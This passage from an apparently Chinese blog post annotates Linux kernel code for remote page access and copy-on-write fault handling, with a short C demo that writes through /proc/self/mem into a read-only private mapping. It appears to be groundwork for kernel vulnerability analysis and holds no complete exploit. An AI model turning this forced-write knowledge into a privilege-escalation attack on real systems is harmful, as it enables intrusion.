//把要访问的其他进程的页面锁定在内存中,避免缺页异常,这里只获取1页,page就是锁定的那一页
ret = get_user_pages_remote(tsk, mm, addr, 1,
write, 1, &page, &vma);
if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
break;
#else
/*
* Check if this is a VM_IO | VM_PFNMAP VMA, which
* we can access using slightly different code.
*/
vma = find_vma(mm, addr);
if (!vma || vma->vm_start > addr)
break;
if (vma->vm_ops && vma->vm_ops->access)
ret = vma->vm_ops->access(vma, addr, buf,
len, write);
if (ret <= 0)
break;
bytes = ret;
#endif
} else {
bytes = len; //要写入的长度
offset = addr & (PAGE_SIZE-1); //addr的页内偏移
/*
bytes+offset <= PAGE_SIZE
=>写入长度+页内偏移<=PAGE_SIZE
=>锁定是页为单位的,因此不能跨页写入
*/
if (bytes > PAGE_SIZE-offset)
bytes = PAGE_SIZE-offset;
//此时的page为get_user_pages_remote()为用户寻找的,是被锁定在内存中的页,kmap将其映射在内核地址空间中
maddr = kmap(page);
if (write) { //写入请求
/*
先调用copy_to_user_page()进行写入
maddr为根据addr锁定的页,offset为addr额页内偏移,两者相加就是要写入的地址
等价为:memcpy(maddr + offset, buf, bytes)
*/
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes);
//标记为脏页
set_page_dirty_lock(page);
} else {
//等价:memcpy(buf, maddr+offset, bytes)
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes);
}
kunmap(page);
put_page(page);//释放
}
len -= bytes;
buf += bytes;
addr += bytes;
}
up_read(&mm->mmap_sem);

return buf - old_buf;
}

这个函数的核心就在与怎么把别的进程的页面锁定在内存中的, 因此get_user_pages_remote()__access_remote_vm()的核心函数

get_user_pages_remote()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
/*
* get_user_pages_remote() - pin user pages in memory
* @tsk: the task_struct to use for page fault accounting, or
* NULL if faults are not to be recorded.
* @mm: mm_struct of target mm
* @start: starting user address
* @nr_pages: number of pages from start to pin
* @write: whether pages will be written to by the caller
* @force: whether to force access even when user mapping is currently
* protected (but never forces write access to shared mapping).
* @pages: array that receives pointers to the pages pinned.
* Should be at least nr_pages long. Or NULL, if caller
* only intends to ensure the pages are faulted in.
* @vmas: array of pointers to vmas corresponding to each page.
* Or NULL if the caller does not require them.
*
* Returns number of pages pinned. This may be fewer than the number
* requested. If nr_pages is 0 or negative, returns 0. If no pages
* were pinned, returns -errno. Each page returned must be released
* with a put_page() call when it is finished with. vmas will only
* remain valid while mmap_sem is held.
*
* Must be called with mmap_sem held for read or write.
*
* get_user_pages walks a process's page tables and takes a reference to
* each struct page that each user address corresponds to at a given
* instant. That is, it takes the page that would be accessed if a user
* thread accesses the given user virtual address at that instant.
*
* This does not guarantee that the page exists in the user mappings when
* get_user_pages returns, and there may even be a completely different
* page there in some cases (eg. if mmapped pagecache has been invalidated
* and subsequently re faulted). However it does guarantee that the page
* won't be freed completely. And mostly callers simply care that the page
* contains data that was valid *at some point in time*. Typically, an IO
* or similar operation cannot guarantee anything stronger anyway because
* locks can't be held over the syscall boundary.
*
* If write=0, the page must not be written to. If the page is written to,
* set_page_dirty (or set_page_dirty_lock, as appropriate) must be called
* after the page is finished with, and before put_page is called.
*
* get_user_pages is typically used for fewer-copy IO operations, to get a
* handle on the memory by some means other than accesses via the user virtual
* addresses. The pages may be submitted for DMA to devices or accessed via
* their kernel linear mapping (via the kmap APIs). Care should be taken to
* use the correct cache flushing APIs.
*
* See also get_user_pages_fast, for performance critical applications.
*
* get_user_pages should be phased out in favor of
* get_user_pages_locked|unlocked or get_user_pages_fast. Nothing
* should use get_user_pages because it cannot pass
* FAULT_FLAG_ALLOW_RETRY to handle_mm_fault.
*/
/*
get_user_pages_remote()-把用户页面锁定在内存中
@tsk:用于进行缺页异常计数的任务描述符,如果是NULL的话就不进行记数
@mm:目标虚拟内存空间
@start:起始用户地址
@nr_pages:从start开始要锁定多少页面
@write:这些要锁定的页面是否需要被写入
@force:当用户映射正在被保护时,用于存放指向被锁定的pages的指针
@vms:一个VMA指针数组,用于存放每一个页面对应的VMA对象

返回被锁定的页面数量,有可能比请求的少,如果是0或者负数,就表示出错了
pages中返回的每一个页面都必须通过put_page()进行释放
vmas中的指针会一直有效,直到mmap_sem被释放
*/
long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
int write, int force, struct page **pages,
struct vm_area_struct **vmas)
{
return __get_user_pages_locked(tsk, mm, start, nr_pages, write, force,
pages, vmas, NULL, false,
FOLL_TOUCH | FOLL_REMOTE);
}

get_user_pages_remote()是对__get_user_pages_locked()的包装

__get_user_pages_locked()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
static __always_inline long __get_user_pages_locked(struct task_struct *tsk,//进行缺页计数的
struct mm_struct *mm, //目标虚拟内存地址
unsigned long start, //起始地址
unsigned long nr_pages, //锁定多少页
int write, //是否需要写入
int force, //是否强制锁定
struct page **pages, //锁定页面的指针数组
struct vm_area_struct **vmas, //被锁定页面对应的VMA数组指针
int *locked, //是否使用VM_FAULT_RETRY的功能,设为NULL
bool notify_drop, //不进行通知,设为false
unsigned int flags) //标志
{
long ret, pages_done;
bool lock_dropped;

if (locked) {
/* if VM_FAULT_RETRY can be returned, vmas become invalid */
BUG_ON(vmas);
/* check caller initialized locked */
BUG_ON(*locked != 1);
}

if (pages)//如果需要获取页面,设置FILL_GET标志
flags |= FOLL_GET;
if (write)//如果需要写入,设置FOLL_WRITE标志
flags |= FOLL_WRITE;
if (force)//是否强制锁定
flags |= FOLL_FORCE;

pages_done = 0;
lock_dropped = false;
for (;;) {
ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
vmas, locked);
if (!locked)//如果VM_FAULT_RETRY无法触发,就直接返回
/* VM_FAULT_RETRY couldn't trigger, bypass */
return ret;

/* VM_FAULT_RETRY cannot return errors */
if (!*locked) {
BUG_ON(ret < 0);
BUG_ON(ret >= nr_pages);
}

if (!pages)
/* If it's a prefault don't insist harder */
return ret;

if (ret > 0) {
nr_pages -= ret;
pages_done += ret;
if (!nr_pages)
break;
}
if (*locked) {
/* VM_FAULT_RETRY didn't trigger */
if (!pages_done)
pages_done = ret;
break;
}
/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
pages += ret;
start += ret << PAGE_SHIFT;

/*
* Repeat on the address that fired VM_FAULT_RETRY
* without FAULT_FLAG_ALLOW_RETRY but with
* FAULT_FLAG_TRIED.
*/
*locked = 1;
lock_dropped = true;
down_read(&mm->mmap_sem);
ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
pages, NULL, NULL);
if (ret != 1) {
BUG_ON(ret > 1);
if (!pages_done)
pages_done = ret;
break;
}
nr_pages--;
pages_done++;
if (!nr_pages)
break;
pages++;
start += PAGE_SIZE;
}
if (notify_drop && lock_dropped && *locked) {
/*
* We must let the caller know we temporarily dropped the lock
* and so the critical section protected by it was lost.
*/
up_read(&mm->mmap_sem);
*locked = 0;
}
return pages_done;
}

调用到__get_user_pages()

__get_user_pages()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
/**
* __get_user_pages() - pin user pages in memory
* @tsk: task_struct of target task
* @mm: mm_struct of target mm
* @start: starting user address
* @nr_pages: number of pages from start to pin
* @gup_flags: flags modifying pin behaviour
* @pages: array that receives pointers to the pages pinned.
* Should be at least nr_pages long. Or NULL, if caller
* only intends to ensure the pages are faulted in.
* @vmas: array of pointers to vmas corresponding to each page.
* Or NULL if the caller does not require them.
* @nonblocking: whether waiting for disk IO or mmap_sem contention
*
* Returns number of pages pinned. This may be fewer than the number
* requested. If nr_pages is 0 or negative, returns 0. If no pages
* were pinned, returns -errno. Each page returned must be released
* with a put_page() call when it is finished with. vmas will only
* remain valid while mmap_sem is held.
*
* Must be called with mmap_sem held. It may be released. See below.
*
* __get_user_pages walks a process's page tables and takes a reference to
* each struct page that each user address corresponds to at a given
* instant. That is, it takes the page that would be accessed if a user
* thread accesses the given user virtual address at that instant.
*
* This does not guarantee that the page exists in the user mappings when
* __get_user_pages returns, and there may even be a completely different
* page there in some cases (eg. if mmapped pagecache has been invalidated
* and subsequently re faulted). However it does guarantee that the page
* won't be freed completely. And mostly callers simply care that the page
* contains data that was valid *at some point in time*. Typically, an IO
* or similar operation cannot guarantee anything stronger anyway because
* locks can't be held over the syscall boundary.
*
* If @gup_flags & FOLL_WRITE == 0, the page must not be written to. If
* the page is written to, set_page_dirty (or set_page_dirty_lock, as
* appropriate) must be called after the page is finished with, and
* before put_page is called.
*
* If @nonblocking != NULL, __get_user_pages will not wait for disk IO
* or mmap_sem contention, and if waiting is needed to pin all pages,
* *@nonblocking will be set to 0. Further, if @gup_flags does not
* include FOLL_NOWAIT, the mmap_sem will be released via up_read() in
* this case.
*
* A caller using such a combination of @nonblocking and @gup_flags
* must therefore hold the mmap_sem for reading only, and recognize
* when it's been released. Otherwise, it must be held for either
* reading or writing and will not be released.
*
* In most cases, get_user_pages or get_user_pages_fast should be used
* instead of __get_user_pages. __get_user_pages should be used only if
* you need some special @gup_flags.
*/
/*
__get_user_pages()-把用户页面固定在内存中
@tsk:目标进程
@mm:目标内存空间
@start:起始用户地址
@nr_pages:锁定多少页面
@gup_flags:控制get user pages的行为标志
@pages:接受被锁定页面指针的指针数组,最少要能保存nr_pages个指针
@vmas:一个VMA指针数组,用于存放每一个页面对应的VMA对象
@nonblocking:是否等待磁盘IO或者mmap_sem竞争
*/
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *nonblocking)
{
long i = 0;
unsigned int page_mask;//根据页面大小设置掩码
struct vm_area_struct *vma = NULL;

if (!nr_pages)
return 0;
/*
——!!pages:等价于pages!=0,表示pages是否为一个非空指针
——!!(gup_flags & FOLL_GET):等价于gup_flags & FOLL_GET!=0,标志是否设置FOLL_GET标志
——只要这两个条件不像等就会出bug
要么pages是个空指针,gup_flags没设置FOLL_GET标志,不需要获取页面
要么pages存在,gup_flags设置了FOLL_GET标志,需要获取页面*/
VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

/*
* If FOLL_FORCE is set then do not force a full fault as the hinting
* fault information is unrelated to the reference behaviour of a task
* using the address space
*/
if (!(gup_flags & FOLL_FORCE))
gup_flags |= FOLL_NUMA;

//通过一个do{...}while(nr_pages)循环, 遍历所有需要锁定的页, 处理一个页之前, 先找到所属的VMA
do {
struct page *page;
unsigned int foll_flags = gup_flags;
unsigned int page_increm;

//如果是第一次迭代,或者跨越了VMA的边界
/* first iteration or cross vma bound */
if (!vma || start >= vma->vm_end) {
vma = find_extend_vma(mm, start);//寻找包含start的VMA对象
if (!vma && in_gate_area(mm, start)) {//寻找出错
int ret;
ret = get_gate_page(mm, start & PAGE_MASK,
gup_flags, &vma,
pages ? &pages[i] : NULL);
if (ret)
return i ? : ret;
page_mask = 0;
goto next_page;
}
//短路测试:如果vma不为NULL,那就会执行check_vma_flags(vma, gup_flags)检查下vma的权限是满足gup_flags的要求
if (!vma || check_vma_flags(vma, gup_flags))
return i ? : -EFAULT;
if (is_vm_hugetlb_page(vma)) {//对于大TLB的页面,调用follow_hugetlb_page()处理
i = follow_hugetlb_page(mm, vma, pages, vmas,
&start, &nr_pages, i,
gup_flags);
continue;
}
}
retry:
/*
* If we have a pending SIGKILL, don't keep faulting pages and
* potentially allocating memory.
*/
/*__get_user_pages()最核心的部分, 就是下面这个循环, follow_page_mask()判断对应页是否满足foll_flags要求, faultin_page()负责处理错误, 会一直循环到对应页满足foll_flags的要求*/
//如果有待处理的SIGKILL,就直接结束
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();//调度执行别的任务
//根据foll_flags的要求追踪vma中start对应的页,如果不能满足要求或者页不存在,就返回NULL
page = follow_page_mask(vma, start, foll_flags, &page_mask);
if (!page) {//缺页异常处理
int ret;
//faultin_page()会处理缺页异常,处理完毕后会返回0
ret = faultin_page(tsk, vma, start, &foll_flags,
nonblocking);
switch (ret) {
case 0:
goto retry;//缺页异常处理完毕,再次尝试追踪页,看有无缺页异常发生
case -EFAULT://处理缺页异常时发送,处理终止
case -ENOMEM:
case -EHWPOISON:
return i ? i : ret;
case -EBUSY:
return i;
case -ENOENT://异常处理完毕,只是没有对应的页描述符,处理下一页
goto next_page;
}
BUG();
} else if (PTR_ERR(page) == -EEXIST) {
/*
* Proper page table entry exists, but no corresponding
* struct page.
*/
goto next_page;
} else if (IS_ERR(page)) {
return i ? i : PTR_ERR(page);
}
//处理完这个页之后, 记录结果, 然后处理下一个页
if (pages) {//记录锁定的页
pages[i] = page;
flush_anon_page(vma, page, start);
flush_dcache_page(page);
page_mask = 0;
}
next_page:
if (vmas) {//记录页对应的vma
vmas[i] = vma;
page_mask = 0;
}
page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
if (page_increm > nr_pages)
page_increm = nr_pages;
i += page_increm;//处理了多少页
start += page_increm * PAGE_SIZE;//下一个处理的地址
nr_pages -= page_increm;//还剩多少页
} while (nr_pages);
return i;
}
EXPORT_SYMBOL(__get_user_pages);

follow_page_mask()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
/**
* follow_page_mask - look up a page descriptor from a user-virtual address
* @vma: vm_area_struct mapping @address
* @address: virtual address to look up
* @flags: flags modifying lookup behaviour
* @page_mask: on output, *page_mask is set according to the size of the page
*
* @flags can have FOLL_ flags set, defined in <linux/mm.h>
*
* Returns the mapped (struct page *), %NULL if no mapping exists, or
* an error pointer if there is a mapping to something not represented
* by a page descriptor (see also vm_normal_page()).
*/
/*
follow_page_mask -根据一个用户空间地址找一个页描述符
@vma:映射@address的VMA对象
@flags:控制查找行为的描述符
@page_mask:*page_mask根据页面大小设置

返回被映射的页,如果页不存在或者出错的话就返回NULL
*/
struct page *follow_page_mask(struct vm_area_struct *vma,
unsigned long address, unsigned int flags,
unsigned int *page_mask)
{
pgd_t *pgd;//全局页目录
pud_t *pud;//页上级目录
pmd_t *pmd;//页中级目录
spinlock_t *ptl;//自旋锁
struct page *page;
struct mm_struct *mm = vma->vm_mm;//VMA所属的内存空间

*page_mask = 0;//根据页面大小设置的掩码

page = follow_huge_addr(mm, address, flags & FOLL_WRITE);
if (!IS_ERR(page)) {
BUG_ON(flags & FOLL_GET);
return page;
}
/*
跟踪四级页目录:pgd=>pud=>pmd,
如果对应表项为none, 则返回no_page_table()表示出错, 最后进入follow_page_pte()跟踪pte
*/
//在mm中根据address找对应的页全局目录
pgd = pgd_offset(mm, address);
if (pgd_none(*pgd) || unlikely(pgd_bad(*pgd)))
return no_page_table(vma, flags);

//在页全局目录中找对应的页上级目录
pud = pud_offset(pgd, address);
if (pud_none(*pud))
return no_page_table(vma, flags);
if (pud_huge(*pud) && vma->vm_flags & VM_HUGETLB) {
page = follow_huge_pud(mm, address, pud, flags);
if (page)
return page;
return no_page_table(vma, flags);
}
if (unlikely(pud_bad(*pud)))
return no_page_table(vma, flags);
//在页上级目录中找对应的页中级目录
pmd = pmd_offset(pud, address);
if (pmd_none(*pmd))
return no_page_table(vma, flags);
if (pmd_huge(*pmd) && vma->vm_flags & VM_HUGETLB) {
page = follow_huge_pmd(mm, address, pmd, flags);
if (page)
return page;
return no_page_table(vma, flags);
}
if ((flags & FOLL_NUMA) && pmd_protnone(*pmd))
return no_page_table(vma, flags);
if (pmd_devmap(*pmd)) {
ptl = pmd_lock(mm, pmd);
page = follow_devmap_pmd(vma, address, pmd, flags);
spin_unlock(ptl);
if (page)
return page;
}
if (likely(!pmd_trans_huge(*pmd)))//跟踪pte
return follow_page_pte(vma, address, pmd, flags);

ptl = pmd_lock(mm, pmd);
if (unlikely(!pmd_trans_huge(*pmd))) {
spin_unlock(ptl);
return follow_page_pte(vma, address, pmd, flags);
}
if (flags & FOLL_SPLIT) {
int ret;
page = pmd_page(*pmd);
if (is_huge_zero_page(page)) {
spin_unlock(ptl);
ret = 0;
split_huge_pmd(vma, pmd, address);
if (pmd_trans_unstable(pmd))
ret = -EBUSY;
} else {
get_page(page);
spin_unlock(ptl);
lock_page(page);
ret = split_huge_page(page);
unlock_page(page);
put_page(page);
if (pmd_none(*pmd))
return no_page_table(vma, flags);
}

return ret ? ERR_PTR(ret) :
follow_page_pte(vma, address, pmd, flags);
}

page = follow_trans_huge_pmd(vma, address, pmd, flags);
spin_unlock(ptl);
*page_mask = HPAGE_PMD_NR - 1;
return page;
}

follow_page_pte()

对于大多数普通页来说follow_page_pte()会检查页不存在和页不可写入两种缺页异常, 然后调用vm_normal_page()根据pte找到对应的页描述符page

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
//根据flags标志跟踪页面的pte
static struct page *follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags)
{
struct mm_struct *mm = vma->vm_mm;
struct dev_pagemap *pgmap = NULL;
struct page *page;
spinlock_t *ptl;
pte_t *ptep, pte;

retry:
if (unlikely(pmd_bad(*pmd)))
return no_page_table(vma, flags);

ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
pte = *ptep;
if (!pte_present(pte)) {
swp_entry_t entry;
/*
* KSM's break_ksm() relies upon recognizing a ksm page
* even while it is being migrated, so for that case we
* need migration_entry_wait().
*/
if (likely(!(flags & FOLL_MIGRATION)))
goto no_page;
if (pte_none(pte))
goto no_page;
entry = pte_to_swp_entry(pte);
if (!is_migration_entry(entry))
goto no_page;
pte_unmap_unlock(ptep, ptl);
migration_entry_wait(mm, pmd, address);
goto retry;
}
if ((flags & FOLL_NUMA) && pte_protnone(pte))
goto no_page;
if ((flags & FOLL_WRITE) && !pte_write(pte)) {//如果要求写入,但是pte表示不可写入
pte_unmap_unlock(ptep, ptl);
return NULL;
}

page = vm_normal_page(vma, address, pte);//根据这个pte找到对应的普通页描述符
/*
找到页描述符后, 会根据flags进行一些操作, 然后返回page, 在这里flags = 0x2017, 也就是如下标志
FOLL_WRITE 0x01 : 需要进行写入
FOLL_TOUCH 0x02 : 标记一下页面被访问过
FOLL_GET 0x04 : 获取页面的引用, 从而让页面锁定在内存中
FOLL_FORCE 0x10 : 强制写入只读内存区
FOLL_REMOTE 0x2000 : 要访问的不是当前任务的内存空间
*/
if (!page && pte_devmap(pte) && (flags & FOLL_GET)) {
/*
* Only return device mapping pages in the FOLL_GET case since
* they are only valid while holding the pgmap reference.
*/
pgmap = get_dev_pagemap(pte_pfn(pte), NULL);
if (pgmap)
page = pte_page(pte);
else
goto no_page;
} else if (unlikely(!page)) {
if (flags & FOLL_DUMP) {
/* Avoid special (like zero) pages in core dumps */
page = ERR_PTR(-EFAULT);
goto out;
}

if (is_zero_pfn(pte_pfn(pte))) {
page = pte_page(pte);
} else {
int ret;

ret = follow_pfn_pte(vma, address, ptep, flags);
page = ERR_PTR(ret);
goto out;
}
}

if (flags & FOLL_SPLIT && PageTransCompound(page)) {
int ret;
get_page(page);
pte_unmap_unlock(ptep, ptl);
lock_page(page);
ret = split_huge_page(page);
unlock_page(page);
put_page(page);
if (ret)
return ERR_PTR(ret);
goto retry;
}

if (flags & FOLL_GET) {//如果设置了GET标志,则会获取一个页面的引用,防止页面从内存中被换出
get_page(page);

/* drop the pgmap reference now that we hold the page */
if (pgmap) {
put_dev_pagemap(pgmap);
pgmap = NULL;
}
}
if (flags & FOLL_TOUCH) {//标记下这个页被访问过
//如果要写入,但是页面也在不是脏的话,就设置为脏页
if ((flags & FOLL_WRITE) &&
!pte_dirty(pte) && !PageDirty(page))
set_page_dirty(page);
/*
* pte_mkyoung() would be more correct here, but atomic care
* is needed to avoid losing the dirty bit: it is easier to use
* mark_page_accessed().
*/
//标记
mark_page_accessed(page);
}
if ((flags & FOLL_MLOCK) && (vma->vm_flags & VM_LOCKED)) {
/* Do not mlock pte-mapped THP */
if (PageTransCompound(page))
goto out;

/*
* The preliminary mapping check is mainly to avoid the
* pointless overhead of lock_page on the ZERO_PAGE
* which might bounce very badly if there is contention.
*
* If the page is already locked, we don't need to
* handle it now - vmscan will handle it later if and
* when it attempts to reclaim the page.
*/
if (page->mapping && trylock_page(page)) {
lru_add_drain(); /* push cached pages to LRU */
/*
* Because we lock page here, and migration is
* blocked by the pte's page reference, and we
* know the page is still mapped, we don't even
* need to check for file-cache page truncation.
*/
mlock_vma_page(page);
unlock_page(page);
}
}
out:
pte_unmap_unlock(ptep, ptl);
return page;
no_page:
pte_unmap_unlock(ptep, ptl);
if (!pte_none(pte))
return NULL;
return no_page_table(vma, flags);
}

faultin_page()

faultin_page()会把flags中的FOLL_标志转为handle_mm_fault()使用的FAULT_标志, 然后调用handle_mm_fault()处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
/*
* mmap_sem must be held on entry. If @nonblocking != NULL and
* *@flags does not include FOLL_NOWAIT, the mmap_sem may be released.
* If it is, *@nonblocking will be set to 0 and -EBUSY returned.
*/
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
unsigned long address, unsigned int *flags, int *nonblocking)
{
unsigned int fault_flags = 0;
int ret;

/* mlock all present pages, but do not fault in new pages */
if ((*flags & (FOLL_POPULATE | FOLL_MLOCK)) == FOLL_MLOCK)
return -ENOENT;
/* For mm_populate(), just skip the stack guard page. */
if ((*flags & FOLL_POPULATE) &&
(stack_guard_page_start(vma, address) ||
stack_guard_page_end(vma, address + PAGE_SIZE)))
return -ENOENT;

//根据FOLL_标着设置FAULT_FLAG标志
if (*flags & FOLL_WRITE)
fault_flags |= FAULT_FLAG_WRITE;
if (*flags & FOLL_REMOTE)
fault_flags |= FAULT_FLAG_REMOTE;
if (nonblocking)
fault_flags |= FAULT_FLAG_ALLOW_RETRY;
if (*flags & FOLL_NOWAIT)
fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
if (*flags & FOLL_TRIED) {
VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
fault_flags |= FAULT_FLAG_TRIED;
}
//处理缺页异常
ret = handle_mm_fault(vma, address, fault_flags);
if (ret & VM_FAULT_ERROR) {
if (ret & VM_FAULT_OOM)
return -ENOMEM;
if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
return -EFAULT;
BUG();
}

if (tsk) {
if (ret & VM_FAULT_MAJOR)
tsk->maj_flt++;
else
tsk->min_flt++;
}

if (ret & VM_FAULT_RETRY) {
if (nonblocking)
*nonblocking = 0;
return -EBUSY;
}

/*
* The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
* necessary, even if maybe_mkwrite decided not to set pte_write. We
* can thus safely do subsequent page lookups as if they were reads.
* But only do so when looping for pte_write is futile: in some cases
* userspace may also be wanting to write to the gotten user page,
* which a read fault here might prevent (a readonly page might get
* reCOWed by userspace write).
*/
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;
}

大致的流程

1
2
3
4
5
6
7
8
9
mem_write()
mem_rw()
__access_remote_vm()
__get_user_pages_remote()
__get_user_pages_locked()
__get_user_pages()
follow_page_mask()
follow_page_pte()
faultin_page()

__get_user_pagesの奇妙旅途🤔

测试demo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <stdio.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <fcntl.h>

int fd;
struct stat st;
void *mem;

void processMem(void)
{
int f = open("/proc/self/mem", O_RDWR);
lseek(f, mem, SEEK_SET);
write(f, "AAA", 3);
}

int main(void)
{
fd = open("./test", O_RDONLY);
fstat(fd, &st);
mem = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);

processMem();
}

__get_user_pagesの第一次循环

由于linux的内核的延迟绑定机制,第一次访问某个内存页之前linux kernel 并不会为其分配物理页,所以获取不到对应的页表项,因此第一次进入follow_page_mask自然是返回NULL,此时调用faultin_page(),进入handle_mm_fault,开始缺页异常处理

__handle_mm_fault()负责分配各级页表项, 然后调用handle_pte_fault()

handle_pte_fault()发现是映射到文件, 但整个PTEnone的情况, 会调用do_fault()处理

1
2
3
4
5
6
if (!fe->pte) {//如果 fe->pte 为空,则说明页面不存在,根据 VMA(Virtual Memory Area)是否匿名执行不同的页面处理操作。
if (vma_is_anonymous(fe->vma))
return do_anonymous_page(fe);
else
return do_fault(fe);//分配物理页框
}

do_fault()发现需要写入私有文件映射的内存区就会调用do_cow_fault()进行写时复制

1
2
if (!(vma->vm_flags & VM_SHARED))//如果虚拟内存区域的标志中不包含 VM_SHARED 标志,说明该区域是私有的,函数调用 do_cow_fault 函数处理写时复制错误(Copy-On-Write Fault)。
return do_cow_fault(fe, pgoff);
  • 首先调用alloc_page_vma()分配一个新页
  • 然后调用__do_fault()需要找address对应的原始页的描述符
  • 然后调用copy_user_highpage()把原始页的内容复制到新页中
  • 新旧页都被映射到内核地址空间中, 因此复制的时候直接memcpy()就可以
  • 最后调用alloc_set_pte()设置页表的PTE, 建立反向映射
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
static int do_cow_fault(struct fault_env *fe, pgoff_t pgoff)
{
struct vm_area_struct *vma = fe->vma;
struct page *fault_page, *new_page;
void *fault_entry;
struct mem_cgroup *memcg;
int ret;

if (unlikely(anon_vma_prepare(vma)))
return VM_FAULT_OOM;

new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, fe->address);//为当前进程分配一个新的页面
if (!new_page)
return VM_FAULT_OOM;

if (mem_cgroup_try_charge(new_page, vma->vm_mm, GFP_KERNEL,//为新页面分配内存资源
&memcg, false)) {
put_page(new_page);
return VM_FAULT_OOM;
}

ret = __do_fault(fe, pgoff, new_page, &fault_page, &fault_entry);//读取文件内容到fault_page
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;

if (!(ret & VM_FAULT_DAX_LOCKED))
copy_user_highpage(new_page, fault_page, fe->address, vma);//拷贝fault_page内容到new_page
__SetPageUptodate(new_page);

ret |= alloc_set_pte(fe, memcg, new_page);//设置pte,置换该进程中的pte表项,对于写操作会将该页标脏(该函数会调用maybe_mkwrite()函数,其会调用pte_mkdirty()函数标脏该页)
if (fe->pte)
pte_unmap_unlock(fe->pte, fe->ptl);
if (!(ret & VM_FAULT_DAX_LOCKED)) {//释放fault_page
unlock_page(fault_page);
put_page(fault_page);
} else {
dax_unlock_mapping_entry(vma->vm_file->f_mapping, pgoff);
}
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;
return ret;
uncharge_out:
mem_cgroup_cancel_charge(new_page, memcg, false);
put_page(new_page);
return ret;
}

alloc_set_pte()流程如下, 在本测试程序中, 由于进行COWVMA区域不可写入, 因此得到的COW页只有脏标志, 没有可写标志

注意这里的set_pte_at(), 会把描述此物理页的pte写入到vma->vm_mm这个地址空间的页表中, 也就是让其他用户进程的虚拟内存映射到这个物理页中.

1
2
3
4
5
6
7
8
